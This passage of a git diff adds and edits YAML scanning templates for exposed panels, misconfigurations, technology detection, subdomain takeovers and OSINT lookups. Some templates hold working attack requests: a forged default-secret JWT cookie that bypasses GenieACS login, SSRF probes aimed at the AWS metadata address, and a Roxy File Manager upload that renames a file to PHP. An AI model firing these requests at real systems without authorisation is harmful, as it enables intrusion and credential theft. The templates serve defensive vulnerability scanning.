https://www.facebook.com/photo/?fbid=631801132323743&set=pcb.631801782323678 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Dynamics Container Host" + tags: exposure,dynamic,container + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Dynamics Container Host' + + - type: status + status: + - 200 diff --git a/http/misconfiguration/flask-redis-docker.yaml b/http/misconfiguration/flask-redis-docker.yaml new file mode 100644 index 0000000000..9da058ea9d --- /dev/null +++ b/http/misconfiguration/flask-redis-docker.yaml @@ -0,0 +1,31 @@ +id: flask-redis-docker + +info: + name: Flask Redis Queue Docker - Exposure + author: DhiyaneshDk + severity: low + reference: + - https://www.facebook.com/photo/?fbid=623621413141715&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Flask + Redis Queue + Docker" + tags: misconfig,exposure,flask,redis,docker + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Flask + Redis Queue + Docker' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/genieacs-default-jwt.yaml b/http/misconfiguration/genieacs-default-jwt.yaml new file mode 100644 index 0000000000..1c26efe627 --- /dev/null +++ b/http/misconfiguration/genieacs-default-jwt.yaml @@ -0,0 +1,53 @@ +id: genieacs-default-jwt + +info: + name: GenieACS - Authentication Bypass (Default JWT Secret) + author: DhiyaneshDK,pussycat0x + severity: high + description: | + GenieACS, an Auto Configuration Server (ACS) for TR-069 enabled routers and similar devices, is vulnerable to authentication bypass due to the use of a default JWT secret. During installation, if the default JWT secret "secret" is not changed, an attacker can create a JWT token, sign it, and use this token to log into the GenieACS UI interface. The attack is carried out by setting a cookie named "genieacs-ui-jwt" with its value being the JWT token. + reference: + - https://0x00sec.org/t/genieacs-and-the-tale-of-default-jwt-secret/32738 + classification: + cwe-id: CWE-798 + cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"genieacs" + tags: misconfig,jwt,genieacs,default-jwt + +variables: + cookie_name: genieacs-ui-jwt + default_jwt_secret: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiYXV0aE1ldGhvZCI6ImxvY2FsIiwiaWF0IjoxNzgyNTc0NDEyfQ.y2JaygP5n4WBYQ_dytgS0qet0b6KvtT31UJWqee4L6c + +http: + - raw: + - | + GET /api/presets/?filter=true HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/* + Cookie: {{cookie_name}}={{default_jwt_secret}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"provision":' + - '"provisionArgs":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: dsl + dsl: + - '"JWT Secret 👉 " + cookie_name + "=" + default_jwt_secret' diff --git a/http/misconfiguration/gopher-server.yaml b/http/misconfiguration/gopher-server.yaml new file mode 100644 index 0000000000..aae625d627 --- /dev/null +++ b/http/misconfiguration/gopher-server.yaml @@ -0,0 +1,31 @@ +id: gopher-server + +info: + name: Gopher Server - Exposure + author: DhiyaneshDk + severity: medium + reference: + - https://www.facebook.com/photo/?fbid=627579942745862&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Gopher Server" + tags: misconfig,gopher,server + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Gopher Server' + - 'Environment Variables' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml new file mode 100644 index 0000000000..92f9f5007b --- /dev/null +++ b/http/misconfiguration/grav-register-admin.yaml @@ -0,0 +1,29 @@ +id: grav-register-admin + +info: + name: Grav Register Admin User - Detect + author: DhiyaneshDk + severity: high + metadata: + max-request: 1 + verified: true + shodan-query: title:"Grav Register Admin User" + tags: grav,register,admin + +http: + - method: GET + path: + - "{{BaseURL}}/admin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Grav Register Admin User | Grav' + - 'admin accounts' + condition: and + + - type: status + status: + - 200 diff --git a/http/misconfiguration/http-missing-security-headers.yaml b/http/misconfiguration/http-missing-security-headers.yaml index e833c9ff6a..f953b361f1 100644 --- a/http/misconfiguration/http-missing-security-headers.yaml +++ b/http/misconfiguration/http-missing-security-headers.yaml @@ -22,76 +22,76 @@ http: - type: dsl name: strict-transport-security dsl: - - "!regex('(?i)strict-transport-security', all_headers)" + - "!regex('(?i)strict-transport-security', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: content-security-policy dsl: - - "!regex('(?i)content-security-policy', all_headers)" + - "!regex('(?i)content-security-policy', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: permissions-policy dsl: - - "!regex('(?i)permissions-policy', all_headers)" + - "!regex('(?i)permissions-policy', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: x-frame-options dsl: - - "!regex('(?i)x-frame-options', all_headers)" + - "!regex('(?i)x-frame-options', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: x-content-type-options dsl: - - "!regex('(?i)x-content-type-options', all_headers)" + - "!regex('(?i)x-content-type-options', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: x-permitted-cross-domain-policies dsl: - - "!regex('(?i)x-permitted-cross-domain-policies', all_headers)" + - "!regex('(?i)x-permitted-cross-domain-policies', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: referrer-policy dsl: - - "!regex('(?i)referrer-policy', all_headers)" + - "!regex('(?i)referrer-policy', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: clear-site-data dsl: - - "!regex('(?i)clear-site-data', all_headers)" + - "!regex('(?i)clear-site-data', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: cross-origin-embedder-policy dsl: - - "!regex('(?i)cross-origin-embedder-policy', all_headers)" + - "!regex('(?i)cross-origin-embedder-policy', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: cross-origin-opener-policy dsl: - - "!regex('(?i)cross-origin-opener-policy', all_headers)" + - "!regex('(?i)cross-origin-opener-policy', header)" - "status_code != 301 && status_code != 302" condition: and - type: dsl name: cross-origin-resource-policy dsl: - - "!regex('(?i)cross-origin-resource-policy', all_headers)" + - "!regex('(?i)cross-origin-resource-policy', header)" - "status_code != 301 && status_code != 302" condition: and diff --git a/http/misconfiguration/iis-internal-ip-disclosure.yaml b/http/misconfiguration/iis-internal-ip-disclosure.yaml index 7461ce1687..fe6bce6201 100644 --- a/http/misconfiguration/iis-internal-ip-disclosure.yaml +++ b/http/misconfiguration/iis-internal-ip-disclosure.yaml @@ -30,6 +30,10 @@ http: regex: - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - type: dsl + dsl: + - ip != location + - type: status status: - 301 @@ -39,4 +43,4 @@ http: - type: regex part: location regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' \ No newline at end of file + - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' diff --git a/http/misconfiguration/installer/spip-install.yaml b/http/misconfiguration/installer/spip-install.yaml new file mode 100644 index 0000000000..4c04ea72fe --- /dev/null +++ b/http/misconfiguration/installer/spip-install.yaml @@ -0,0 +1,29 @@ +id: spip-install + +info: + name: SPIP Install - Exposure + author: DhiyaneshDK + severity: high + metadata: + max-request: 1 + verified: "true" + tags: exposure,spip,install + +http: + - method: GET + path: + - "{{BaseURL}}/ecrire/?exec=install" + + host-redirects: true + max-redirects: 1 + matchers-condition: and + matchers: + - type: word + words: + - "Installing publication system..." + - "SPIP" + condition: and + + - type: status + status: + - 200 diff --git a/http/misconfiguration/installer/wp-install.yaml b/http/misconfiguration/installer/wp-install.yaml index 7706f2d3cc..20587270ab 100644 --- a/http/misconfiguration/installer/wp-install.yaml +++ b/http/misconfiguration/installer/wp-install.yaml @@ -2,7 +2,7 @@ id: wp-install info: name: WordPress Exposed Installation - author: princechaddha + author: princechaddha,0xpugazh severity: critical description: Wordpress installation files have been detected classification: @@ -11,14 +11,15 @@ info: cwe-id: CWE-284 reference: - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - tags: wordpress,misconfig + - https://twitter.com/0xPugazh/status/1610315762392268802 + tags: misconfig,panel,wordpress metadata: max-request: 1 http: - method: GET path: - - "{{BaseURL}}/wp-admin/install.php" + - "{{BaseURL}}/wp-admin/install.php?step=1" matchers-condition: and matchers: diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index 77aaec7f7d..e1129c5b18 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -6,9 +6,12 @@ info: severity: low reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml - tags: jetty,misconfig + - https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ metadata: max-request: 1 + verified: true + shodan-query: html:"contexts known to this" + tags: jetty,misconfig http: - method: GET @@ -23,4 +26,4 @@ http: - type: status status: - - 200 + - 404 diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml new file mode 100644 index 0000000000..33b55d10e9 --- /dev/null +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -0,0 +1,30 @@ +id: odoo-unprotected-database + +info: + name: Odoo - Unprotected Database + author: pdteam + severity: critical + description: | + The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access. + remediation: | + Implement and enforce proper authentication and access control measures to protect the Odoo database manager. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Odoo" + tags: odoo,database,unauth + +http: + - method: GET + path: + - '{{BaseURL}}/web/database/manager' + + matchers-condition: and + matchers: + - type: word + words: + - "Warning, your Odoo database manager is not protected." + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml new file mode 100644 index 0000000000..c5c7c803b8 --- /dev/null +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -0,0 +1,31 @@ +id: perfsonar-toolkit + +info: + name: perfSONAR Toolkit - Exposure + author: DhiyaneshDk + severity: medium + reference: + - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 + metadata: + max-request: 1 + verified: true + shodan-query: title:"perfSONAR" + tags: misconfig,perfsonar,toolkit + +http: + - method: GET + path: + - "{{BaseURL}}/toolkit/" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'perfSONAR Toolkit' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/phpnow-works.yaml b/http/misconfiguration/phpnow-works.yaml new file mode 100644 index 0000000000..8bf0695d41 --- /dev/null +++ b/http/misconfiguration/phpnow-works.yaml @@ -0,0 +1,31 @@ +id: phpnow-works + +info: + name: PHPnow works - Exposure + author: DhiyaneshDk + severity: low + reference: + - https://www.facebook.com/photo/?fbid=618545156982674&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: "PHPnow works" + tags: misconfig,phpnow,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'PHPnow Works!' + - 'Server Information' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 9277e43bda..a72f563785 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -10,21 +10,23 @@ id: metadata-service-aws info: name: Amazon AWS Metadata Service Check - author: sullo + author: sullo,DhiyaneshDk severity: critical description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ + - https://twitter.com/Random_Robbie/status/1268186743657947137 + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: proxy,aws,amazon,misconfig,metadata metadata: - max-request: 2 + max-request: 4 + tags: exposure,proxy,aws,amazon,misconfig,metadata http: - raw: @@ -36,6 +38,8 @@ http: hostval: - aws.oast.online - 169.254.169.254 + - 2852039166 # decimal encoding + - 169.254.169.254.nip.io unsafe: true matchers: - type: word @@ -44,5 +48,4 @@ http: - "public-ipv4" - "privateIp" condition: or - # Enhanced by mp on 2022/04/22 diff --git a/http/misconfiguration/roxyfileman-fileupload.yaml b/http/misconfiguration/roxyfileman-fileupload.yaml index d3be1c8e52..a7d2abf091 100644 --- a/http/misconfiguration/roxyfileman-fileupload.yaml +++ b/http/misconfiguration/roxyfileman-fileupload.yaml @@ -16,7 +16,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload + tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive http: - raw: @@ -42,7 +42,7 @@ http: Content-Type: image/jpeg ------WebKitFormBoundary6rbEqFAMRkE0RAB7-- @@ -64,7 +64,7 @@ http: f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php - | - GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 + GET /Uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -75,7 +75,7 @@ http: - type: regex part: body regex: - - "namelifyxor" + - "99acb46eabd01958e22fae1792e83ca9" - type: word part: header @@ -85,5 +85,3 @@ http: - type: status status: - 200 - -# Enhanced by md on 2022/10/04 diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml new file mode 100644 index 0000000000..f76daece6b --- /dev/null +++ b/http/misconfiguration/smokeping-grapher.yaml @@ -0,0 +1,29 @@ +id: smokeping-grapher + +info: + name: SmokePing Latency Page for Network Latency Grapher + author: DhiyaneshDk + severity: low + reference: + - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" + tags: misconfig,smokeping,latency,grapher + +http: + - method: GET + path: + - "{{BaseURL}}/smokeping/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SmokePing Latency Page for' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index f7ff0823a6..e17e449dc0 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -4,39 +4,48 @@ info: name: Spring Boot Actuator - Heap Dump Detection author: that_juan_,dwisiswant0,wdahlenb severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. + description: | + A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. reference: - https://github.com/pyn3rd/Spring-Boot-Vulnerability - tags: springboot,misconfig metadata: - max-request: 2 + max-request: 3 + tags: springboot,exposure,misconfig + +variables: + str: "{{rand_base(6)}}" http: - - method: GET - path: - - "{{BaseURL}}/heapdump" - - "{{BaseURL}}/actuator/heapdump" + - raw: + - | + GET /{{str}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /heapdump HTTP/1.1 + Host: {{Hostname}} + + - | + GET /actuator/heapdump HTTP/1.1 + Host: {{Hostname}} - stop-at-first-match: true max-size: 2097152 # 2MB - Max Size to read from server response - matchers-condition: and + matchers-condition: or matchers: + - type: dsl + dsl: + - "!contains(hex_encode(body_1), '1f8b080000000000')" + - "contains(hex_encode(body_2), '1f8b080000000000')" + condition: and - - type: binary - part: body - binary: - - "4a4156412050524f46494c45" # "JAVA PROFILE" - - "4850524f46" # "HPROF" - - "1f8b080000000000" # Gunzip magic byte + - type: dsl + dsl: + - "!contains(hex_encode(body_1), '1f8b080000000000')" + - "contains(hex_encode(body_3), '1f8b080000000000')" + condition: and + + - type: dsl + dsl: + - "contains(hex_encode(body_2), '4a4156412050524f46494c45') || contains(hex_encode(body_2), '4850524f46')" + - "contains(hex_encode(body_3), '4a4156412050524f46494c45') || contains(hex_encode(body_3), '4850524f46')" condition: or - - - type: word - part: header - words: - - "gzip" - case-insensitive: true - negative: true - - - type: status - status: - - 200 diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml new file mode 100644 index 0000000000..d1ea5c3e10 --- /dev/null +++ b/http/misconfiguration/symfony-fragment.yaml @@ -0,0 +1,32 @@ +id: symfony-fragment + +info: + name: Symfony _fragment - Detect + author: Palanichamy_perumal,TechbrunchFR + severity: unknown + description: | + Symfony servers support a "/_fragment" command that allows clients to provide custom PHP commands and return the HTML output. + reference: | + - https://portswigger.net/daily-swig/symfony-based-websites-open-to-rce-attack-research-finds + - https://medium.com/@m4cddr/how-i-got-rce-in-10-websites-26dd87441f22 + - https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5 + - https://github.com/ambionics/symfony-exploits + metadata: + max-request: 1 + shodan-query: http.html:"symfony Profiler" + verified: true + tags: config,exposure,symfony + +http: + - method: GET + path: + - '{{BaseURL}}/_fragment' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 403" + - "contains(body, 'Symfony') || contains(body, '403 Forbidden')" + - "(\"8b2f83102bc96e5068d36df80301a64d\" == md5(body)) || (\"4df206fbc337c398c3b669172934c8cb\" == md5(body))" + condition: and diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index 05f95fa9af..a4d88c1106 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -19,7 +19,9 @@ http: matchers: - type: word words: - - 'Cluster Overview | Kubecost' + - "Cluster Overview | Kubecost" + - "Kubecost" + condition: or - type: word part: header diff --git a/http/misconfiguration/v2x-control.yaml b/http/misconfiguration/v2x-control.yaml new file mode 100644 index 0000000000..f9413935f7 --- /dev/null +++ b/http/misconfiguration/v2x-control.yaml @@ -0,0 +1,31 @@ +id: v2x-control + +info: + name: V2X Control - Dashboard Exposure + author: DhiyaneshDk + severity: low + reference: + - https://www.facebook.com/photo/?fbid=606940284809828&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"V2X Control" + tags: misconfig,exposure,v2x,control + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'V2X control' + - 'Chemtronics' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/osint/dotcards.yaml b/http/osint/dotcards.yaml index 803cb78a3a..45195864ad 100644 --- a/http/osint/dotcards.yaml +++ b/http/osint/dotcards.yaml @@ -30,4 +30,10 @@ http: words: - "'s dot.Profile" + - type: word + part: body + words: + - '"message":"The username does not exist"' + negative: true + # Enhanced by cs 03/17/2023 diff --git a/http/osint/facebook-page.yaml b/http/osint/facebook-page.yaml new file mode 100644 index 0000000000..da022d8143 --- /dev/null +++ b/http/osint/facebook-page.yaml @@ -0,0 +1,37 @@ +id: facebook-page + +info: + name: Facebook Page Name Information - Detect + author: gpiechnik2 + description: | + Facebook Page name information check was conducted. + severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: "true" + tags: osint,osint-business,osint-social + +self-contained: true +http: + - raw: + - | + GET https://facebook.com/{{user}} HTTP/2 + Host: www.facebook.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 + Sec-Fetch-Mode: navigate + Accept-Language: en-US,en;q=0.9 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "Link: " diff --git a/http/osint/stackoverflow.yaml b/http/osint/stackoverflow.yaml new file mode 100644 index 0000000000..c9856ec2f4 --- /dev/null +++ b/http/osint/stackoverflow.yaml @@ -0,0 +1,33 @@ +id: stackoverflow + +info: + name: StackOverflow User Name Information - Detect + author: lu4nx + severity: info + description: | + StackOverflow user name information check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: "true" + tags: osint,osint-coding,stackoverflow + +self-contained: true +http: + - method: GET + path: + - "https://stackoverflow.com/users/filter?search={{user}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

No users matched your search.

" + negative: true + + - type: status + status: + - 200 diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index ed420d82b7..41fafe0650 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -27,7 +27,7 @@ http: - type: dsl dsl: - - contains(tolower(all_headers), 'x-guploader-uploadid') + - contains(tolower(header), 'x-guploader-uploadid') negative: true - type: word diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index 2dca534674..40d100b61b 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -25,7 +25,6 @@ http: words: - "There isn't a GitHub Pages site here." - "For root URLs (like http://example.com/) you must provide an index.html file" - - "For root URLs (like http://example.com/) you must provide an" condition: or - type: dsl diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml index 992bb26f50..82dc1a1174 100644 --- a/http/takeovers/webflow-takeover.yaml +++ b/http/takeovers/webflow-takeover.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44 + - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172 tags: takeover metadata: max-request: 1 @@ -23,4 +24,4 @@ http: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file + -

The page you are looking for doesn't exist or has been moved.

diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index 77731407c7..8ba2822eb9 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -2,12 +2,14 @@ id: tomcat-detect info: name: Tomcat Detection - author: philippedelteil,dhiyaneshDk + author: philippedelteil,dhiyaneshDk,AdamCrosser severity: info description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. metadata: max-request: 3 shodan-query: title:"Apache Tomcat" + vendor: apache + product: tomcat tags: tech,tomcat,apache http: @@ -22,7 +24,7 @@ http: matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "tomcat")' + - 'contains(tolower(header), "tomcat")' - type: dsl dsl: @@ -33,6 +35,7 @@ http: extractors: - type: regex + name: version group: 1 regex: - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/http/technologies/aws/aws-bucket-service.yaml b/http/technologies/aws/aws-bucket-service.yaml index 74b3829057..a077366d27 100644 --- a/http/technologies/aws/aws-bucket-service.yaml +++ b/http/technologies/aws/aws-bucket-service.yaml @@ -17,13 +17,13 @@ http: matchers: - type: dsl dsl: - - contains(tolower(all_headers), 'x-amz-bucket') - - contains(tolower(all_headers), 'x-amz-request') - - contains(tolower(all_headers), 'x-amz-id') - - contains(tolower(all_headers), 'amazons3') + - contains(tolower(header), 'x-amz-bucket') + - contains(tolower(header), 'x-amz-request') + - contains(tolower(header), 'x-amz-id') + - contains(tolower(header), 'amazons3') condition: or - type: dsl dsl: - - contains(tolower(all_headers), 'x-guploader-uploadid') + - contains(tolower(header), 'x-guploader-uploadid') negative: true diff --git a/http/technologies/aws/aws-cloudfront-service.yaml b/http/technologies/aws/aws-cloudfront-service.yaml index c79d2d5493..708f5c9b19 100644 --- a/http/technologies/aws/aws-cloudfront-service.yaml +++ b/http/technologies/aws/aws-cloudfront-service.yaml @@ -18,7 +18,7 @@ http: - type: dsl condition: or dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" + - "contains(tolower(header), 'x-cache: hit from cloudfront')" + - "contains(tolower(header), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(header), 'x-cache: miss from cloudfront')" + - "contains(tolower(header), 'x-cache: error from cloudfront')" diff --git a/http/technologies/cloudfoundry-detect.yaml b/http/technologies/cloudfoundry-detect.yaml index 649274630b..310c8beca4 100644 --- a/http/technologies/cloudfoundry-detect.yaml +++ b/http/technologies/cloudfoundry-detect.yaml @@ -27,4 +27,4 @@ http: - type: dsl dsl: - - 'contains(all_headers, "X-Vcap-Request-Id:") || contains(all_headers, "X-Cf-Routererror:")' + - 'contains(header, "X-Vcap-Request-Id:") || contains(header, "X-Cf-Routererror:")' diff --git a/http/technologies/confluence-detect.yaml b/http/technologies/confluence-detect.yaml index a1843bfd86..abefc2a057 100644 --- a/http/technologies/confluence-detect.yaml +++ b/http/technologies/confluence-detect.yaml @@ -2,17 +2,21 @@ id: confluence-detect info: name: Confluence Detect - author: philippedelteil + author: philippedelteil,AdamCrosser severity: info description: Allows you to detect Atlassian Confluence instances metadata: - max-request: 4 + category: productivity + max-request: 5 + product: confluence_server shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian + vendor: atlassian + tags: tech,confluence,atlassian,detect http: - method: GET path: + - "{{BaseURL}}/dologin.action" - "{{BaseURL}}" - "{{BaseURL}}/pages" - "{{BaseURL}}/confluence" @@ -35,8 +39,13 @@ http: extractors: - type: regex + name: version part: body group: 1 regex: - '' - - 'Atlassian Confluence ([a-z0-9-._]+)' \ No newline at end of file + - 'Atlassian Confluence ([a-z0-9-._]+)' + + - type: kval + kval: + - version \ No newline at end of file diff --git a/http/technologies/default-apache-miracle.yaml b/http/technologies/default-apache-miracle.yaml new file mode 100644 index 0000000000..a2073a479d --- /dev/null +++ b/http/technologies/default-apache-miracle.yaml @@ -0,0 +1,27 @@ +id: default-apache-miracle + +info: + name: Default Apache Miracle Linux Web Server Page + author: DhiyaneshDK + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: title:"Apache Miracle Linux Web Server" + tags: tech,default-page,apache,miracle + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache Miracle Linux Web Server' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/technologies/google/google-bucket-service.yaml b/http/technologies/google/google-bucket-service.yaml index 3f8058a2c2..cf0faf9a26 100644 --- a/http/technologies/google/google-bucket-service.yaml +++ b/http/technologies/google/google-bucket-service.yaml @@ -16,11 +16,11 @@ http: matchers: - type: dsl dsl: - - contains(tolower(all_headers), 'x-goog-component-count') - - contains(tolower(all_headers), 'x-goog-expiration') - - contains(tolower(all_headers), 'x-goog-generation') - - contains(tolower(all_headers), 'x-goog-metageneration') - - contains(tolower(all_headers), 'x-goog-stored-content-encoding') - - contains(tolower(all_headers), 'x-goog-stored-content-length') - - contains(tolower(all_headers), 'x-guploader-uploadid') + - contains(tolower(header), 'x-goog-component-count') + - contains(tolower(header), 'x-goog-expiration') + - contains(tolower(header), 'x-goog-generation') + - contains(tolower(header), 'x-goog-metageneration') + - contains(tolower(header), 'x-goog-stored-content-encoding') + - contains(tolower(header), 'x-goog-stored-content-length') + - contains(tolower(header), 'x-guploader-uploadid') condition: or diff --git a/http/technologies/jenkins-detect.yaml b/http/technologies/jenkins-detect.yaml index 2f795da533..6832efe6c1 100644 --- a/http/technologies/jenkins-detect.yaml +++ b/http/technologies/jenkins-detect.yaml @@ -2,7 +2,7 @@ id: jenkins-detect info: name: Jenkins Detection - author: philippdelteil,daffainfo,c-sh0 + author: philippdelteil,daffainfo,c-sh0,AdamCrosser severity: info reference: - https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion @@ -11,7 +11,10 @@ info: metadata: max-request: 2 shodan-query: http.favicon.hash:81586312 - tags: tech,jenkins + vendor: jenkins + product: jenkins + category: devops + tags: tech,jenkins,detect http: - method: GET @@ -36,5 +39,10 @@ http: extractors: - type: kval + name: version kval: - x_jenkins + + - type: kval + kval: + - version diff --git a/http/exposed-panels/jira-detect.yaml b/http/technologies/jira-detect.yaml similarity index 80% rename from http/exposed-panels/jira-detect.yaml rename to http/technologies/jira-detect.yaml index f107baaf14..38b430bbc7 100644 --- a/http/exposed-panels/jira-detect.yaml +++ b/http/technologies/jira-detect.yaml @@ -1,17 